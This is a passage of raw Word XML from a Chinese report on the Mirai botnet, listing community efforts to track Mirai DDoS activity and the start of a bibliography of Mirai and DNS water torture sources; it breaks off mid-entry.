      </w:pPr>
    </w:p>
    <w:p w:rsidR="008E4800" w:rsidRDefault="002D6D7F" w:rsidP="002D6D7F">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc472191678"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>社区研究进展</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w:rsidR="002D6D7F" w:rsidRDefault="002D6D7F" w:rsidP="00733050">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="300" w:lineRule="atLeast"/>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00733050">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>两位研究者在Tweet上建立了</w:t>
      </w:r>
      <w:r w:rsidR="00453D35">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>消息源</w:t>
      </w:r>
      <w:r w:rsidR="000E1845" w:rsidRPr="00733050">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(https://twitter.com/MiraiAttacks)</w:t>
      </w:r>
      <w:r w:rsidRPr="00733050">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00733050">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>追踪Mirai发起的</w:t>
      </w:r>
      <w:r w:rsidRPr="00733050">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DDo</w:t>
      </w:r>
      <w:r w:rsidRPr="00733050">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>S攻击</w:t>
      </w:r>
      <w:r w:rsidR="00AB2484">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。他们将400K网络标记为“#</w:t>
      </w:r>
      <w:r w:rsidR="00AB2484">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>14</w:t>
      </w:r>
      <w:r w:rsidR="00AB2484">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:id w:val="-591092268"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00010BA8">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00010BA8">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidR="00010BA8">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText>CITATION len16 \l 2052</w:instrText>
          </w:r>
          <w:r w:rsidR="00010BA8">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidR="00010BA8">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00B65ABC">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:noProof/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00B65ABC" w:rsidRPr="00B65ABC">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:noProof/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t>[15]</w:t>
          </w:r>
          <w:r w:rsidR="00010BA8">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="00453D35" w:rsidRDefault="009D7B07" w:rsidP="00733050">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="300" w:lineRule="atLeast"/>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>360网络安全研究院上线了Mirai-Scanner（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>http://data.netlab.360.com/mirai-scanner</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>）界面，追踪Mirai僵尸网络的规模</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7472F" w:rsidRDefault="00A7472F" w:rsidP="00CB04DD">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="300" w:lineRule="atLeast"/>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A7472F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MalwareTech</w:t>
      </w:r>
      <w:r w:rsidR="0070776C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>博主</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>上线了Mirai及其他僵尸网络的扫描监控系统</w:t>
      </w:r>
      <w:r w:rsidR="00CB04DD" w:rsidRPr="00CB04DD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>https://intel.malwaretech.com/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00733050" w:rsidRDefault="00733050" w:rsidP="00453D35">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="300" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00453D35" w:rsidRDefault="00453D35" w:rsidP="00453D35">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="300" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00453D35" w:rsidRDefault="00453D35" w:rsidP="00453D35">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="300" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00453D35" w:rsidRDefault="00453D35" w:rsidP="00453D35">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="300" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00453D35" w:rsidRPr="00453D35" w:rsidRDefault="00453D35" w:rsidP="00453D35">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="300" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:bookmarkStart w:id="15" w:name="_Toc472191679" w:displacedByCustomXml="next"/>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:id w:val="-894884360"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Bibliographies"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w:rsidR="00A6519C" w:rsidRDefault="00A6519C">
          <w:pPr>
            <w:pStyle w:val="1"/>
            <w:ind w:firstLine="883"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:lang w:val="zh-CN"/>
            </w:rPr>
            <w:t>书目</w:t>
          </w:r>
          <w:bookmarkEnd w:id="15"/>
        </w:p>
        <w:sdt>
          <w:sdtPr>
            <w:id w:val="111145805"/>
            <w:bibliography/>
          </w:sdtPr>
          <w:sdtContent>
            <w:p w:rsidR="00B65ABC" w:rsidRDefault="00A6519C" w:rsidP="009A1AB3">
              <w:pPr>
                <w:ind w:firstLine="422"/>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1"/>
                <w:gridCol w:w="8005"/>
              </w:tblGrid>
              <w:tr w:rsidR="00B65ABC">
                <w:trPr>
                  <w:divId w:val="935603005"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00B65ABC" w:rsidRDefault="00B65ABC">
                    <w:pPr>
                      <w:pStyle w:val="a9"/>
                      <w:rPr>
                        <w:noProof/>
                        <w:kern w:val="0"/>
                        <w:sz w:val="24"/>
                        <w:szCs w:val="24"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[1] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00B65ABC" w:rsidRDefault="00B65ABC">
                    <w:pPr>
                      <w:pStyle w:val="a9"/>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">R. Dobbins, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>“</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>Mirai IoT Botnet Description and DDoS Attack Mitigation,</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>”</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve"> 26 10 2016. [</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>联机</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>]. Available: https://www.arbornetworks.com/blog/asert/mirai-iot-botnet-description-ddos-attack-mitigation/.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00B65ABC">
                <w:trPr>
                  <w:divId w:val="935603005"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00B65ABC" w:rsidRDefault="00B65ABC">
                    <w:pPr>
                      <w:pStyle w:val="a9"/>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[2] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00B65ABC" w:rsidRDefault="00B65ABC">
                    <w:pPr>
                      <w:pStyle w:val="a9"/>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Y. T. K. R. e. a. Takeuchi Y, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>“</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>Detection of the DNS Water Torture Attack by Analyzing Features of the Subdomain Name,</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>”</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve"> </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Journal of Information Processing, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">pp. 793-801, 5 24 2016. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00B65ABC">
                <w:trPr>
                  <w:divId w:val="935603005"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00B65ABC" w:rsidRDefault="00B65ABC">
                    <w:pPr>
                      <w:pStyle w:val="a9"/>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[3] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00B65ABC" w:rsidRDefault="00B65ABC">
                    <w:pPr>
                      <w:pStyle w:val="a9"/>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Secure64, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>“</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>Water Torture: A Slow Drip DNS DDoS Attack,</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>”</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve"> 25 2 2014. [</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>联机</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>]. Available: https://blog.secure64.com/?p=377.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00B65ABC">
                <w:trPr>
                  <w:divId w:val="935603005"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00B65ABC" w:rsidRDefault="00B65ABC">
                    <w:pPr>
                      <w:pStyle w:val="a9"/>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[4] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00B65ABC" w:rsidRDefault="00B65ABC">
                    <w:pPr>
                      <w:pStyle w:val="a9"/>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>360</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>网络安全研究院</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>“关于</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>dyn/twitter</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>受攻击情况的说明和</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>mirai</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>僵尸网络的回顾</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>,</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>”</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve"> 23 10 2016. [</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>联机</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>]. Available: http://blog.netlab.360.com/a-dyn-twitter-ddos-event-report-and-mirai-botnet-review/.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00B65ABC">
                <w:trPr>
                  <w:divId w:val="935603005"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00B65ABC" w:rsidRDefault="00B65ABC">
                    <w:pPr>
                      <w:pStyle w:val="a9"/>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[5] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00B65ABC" w:rsidRDefault="00B65ABC">
                    <w:pPr>
                      <w:pStyle w:val="a9"/>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>360</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>网络安全研究院</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>“德国电信断网：</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>mirai</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
